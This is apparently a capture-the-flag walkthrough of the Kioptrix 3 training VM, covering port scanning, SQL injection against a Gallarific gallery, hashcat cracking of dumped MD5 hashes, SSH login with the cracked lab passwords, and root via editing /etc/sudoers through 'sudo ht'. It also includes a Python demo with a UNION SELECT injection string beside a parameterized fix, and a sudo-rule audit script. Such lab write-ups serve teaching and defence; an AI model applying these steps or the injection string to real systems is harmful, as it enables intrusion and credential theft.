Rooting Kioptrix 3 Walkthrough


Kioptrix 3 is a boot-to-root (B2R) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root this virtual machine by exploiting possible vulnerabilities, leading to full system compromise.

Vulnerabilities Exploited:

  • SQL Injection
  • Password reuse
  • Sudo Misconfiguration

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 3 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap


I used netdiscover to find the IP address of the target VM.


Target VM IP Address:

I modified my /etc/hosts file as guided by the author of the VM.

root@kali:~# cat /etc/hosts

Next, I used nmap to find open ports/services on the target machine.

root@kali:~# nmap -p- -A

Starting Nmap 7.70 ( ) at 2018-05-30 00:02 EDT
Nmap scan report for
Host is up (0.00026s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:62:9A:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.26 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds

Guess what, there is a website hosted on port 80. Let's explore the website in a browser…

In the comments, I found the gallery admin panel.

The title of the login page tells me that the target gallery is Gallarific Photo Gallery.


A quick Google search shows a known SQL injection in Gallarific Photo Gallery.


Using SQL injection, I dumped the plaintext admin username and password

and logged into the Gallarific gallery.


Oops, this path goes no further. We cannot do much with this admin panel.

Let's use SQL injection to read the local file system. Reading /etc/passwd, /etc/group and /etc/my.cnf succeeds, but no other local configuration file is readable.

Let's check for other databases and tables using SQL injection.

Found two default databases, with only “gallery” as a user-created database. Let's find the tables in the gallery database.

Hm… dev_accounts seems an interesting table name. Let's find its columns…

and dump the username:password pairs.
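The root cause of everything from the admin login dump to the dev_accounts dump above is one pattern: a request parameter concatenated into SQL. The following is an added example, not code from the walkthrough or from Gallarific; it uses an in-memory SQLite database with constructed rows (table names from the page, values made up) to show the vulnerable query beside the hardened one.

```python
import sqlite3

# Constructed sample schema: a "gallery" database with a users table and a
# dev_accounts table, as found on the box. All rows here are made up.
SCHEMA = """
CREATE TABLE gallarific_users (id INTEGER, username TEXT, password TEXT);
INSERT INTO gallarific_users VALUES (1, 'admin', 'constructed-not-real');
CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
INSERT INTO dev_accounts VALUES (1, 'dreg', '0123456789abcdef0123456789abcdef');
INSERT INTO dev_accounts VALUES (2, 'loneferret', 'fedcba9876543210fedcba9876543210');
CREATE TABLE photos (id INTEGER, title TEXT);
INSERT INTO photos VALUES (1, 'goat');
"""

def open_gallery_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con

def photo_by_id_vulnerable(con, photo_id):
    # The gallery's pattern: the request parameter is pasted into the SQL text,
    # so the database parses attacker-controlled characters as SQL.
    sql = "SELECT id, title FROM photos WHERE id=" + photo_id
    return con.execute(sql).fetchall()

def photo_by_id_safe(con, photo_id):
    # Hardened form: validate the type first (a photo id is an integer), then
    # bind the value so the driver never treats it as SQL.
    pid = int(photo_id)  # raises ValueError for anything that is not a number
    return con.execute("SELECT id, title FROM photos WHERE id=?", (pid,)).fetchall()

def safe_rejects(con, photo_id):
    """True if the hardened lookup refuses the input instead of running it."""
    try:
        photo_by_id_safe(con, photo_id)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    con = open_gallery_db()
    # Same id parameter, two implementations: only the first leaks other tables.
    leaked = photo_by_id_vulnerable(con, "1 UNION SELECT username, password FROM dev_accounts")
    print("vulnerable:", leaked)
    print("safe rejects injection:", safe_rejects(con, "1 UNION SELECT 1,2"))
```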

I cracked these hashes with hashcat.


root@kali:~# hashcat -m 0 -a 0 --force  -o found1.txt  hashes.txt /root/rockyou.txt

hashcat (v4.0.1) starting...
OpenCL Platform #1: The pocl project
* Device #1: pthread-Intel(R) Core(TM) i7-3520M CPU @ 2.90GHz, 512/1493 MB allocatable, 4MCU

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
Password length minimum: 0
Password length maximum: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll'
Dictionary cache hit:
* Filename..: /root/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
- Device #1: autotuned kernel-accel to 1024
- Device #1: autotuned kernel-loops to 1
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Wed May 30 05:06:33 2018 (5 secs)
Time.Estimated...: Wed May 30 05:06:38 2018 (0 secs)
Guess.Base.......: File (/root/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  3110.3 kH/s (0.68ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10838016/14344385 (75.56%)
Rejected.........: 0/10838016 (0.00%)
Restore.Point....: 10833920/14344385 (75.53%)
Candidates.#1....: MasterFlick -> March3490
HWMon.Dev.#1.....: N/A

Started: Wed May 30 05:06:32 2018
Stopped: Wed May 30 05:06:39 2018
root@kali:~# cat found1.txt

//dreg:Mast3r // dreg does not have sudo privilege,

//loneferret:starwars // loneferret has sudo privilege


root@kali:~# ssh loneferret@
loneferret@'s password:
Permission denied, please try again.
loneferret@'s password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
Last login: Wed May  9 15:35:14 2018 from

Privilege Escalation

loneferret@Kioptrix3:~$ cat CompanyPolicy.README  // company policy says: use sudo ht :)
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo ht

Let's edit /etc/sudoers to grant loneferret sudo access.
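The sudo rules shown above are the whole privilege-escalation story: an editor run as root can write /etc/sudoers, so the `!/usr/bin/su` deny rule restricts nothing. The following is an added audit script, not part of the walkthrough, that parses `sudo -l` output (the two rules from this box are embedded as constructed input) and flags editor commands granted as root; the editor list beyond ht is an assumption.

```python
import re

# Constructed from the sudo -l listing shown above (same two rules).
SUDO_L_OUTPUT = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Programs that can open and write arbitrary files when run as root, which is
# enough to rewrite /etc/sudoers. ht is from this box; the rest are assumed.
EDITORS = {"ht", "vi", "vim", "nano", "emacs", "less", "more"}

# Matches one rule line: "(runas) [TAG: ...] command".
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")

def audit_sudo_l(text):
    """Return (severity, message) findings for a `sudo -l` listing."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header or non-rule text
        runas, tags = m.group("runas"), m.group("tags")
        cmd = m.group("cmd").strip()
        if cmd.startswith("!"):
            # A deny rule only blocks that exact path; it is bypassed by any
            # permitted command that can write files or spawn a shell.
            findings.append(("info", f"deny rule {cmd} restricts nothing on its own"))
            continue
        path = cmd.split()[0]
        name = path.rsplit("/", 1)[-1]
        as_root = runas.split(",")[0].strip() in ("root", "ALL")
        if as_root and name in EDITORS:
            sev = "critical" if "NOPASSWD" in tags else "high"
            findings.append((sev, f"{path} as {runas}: editor can rewrite /etc/sudoers, equivalent to full root"))
    return findings

if __name__ == "__main__":
    for severity, message in audit_sudo_l(SUDO_L_OUTPUT):
        print(f"[{severity}] {message}")
```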

Let's confirm sudo access.

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/loneferret# whoami

and got root access!!!

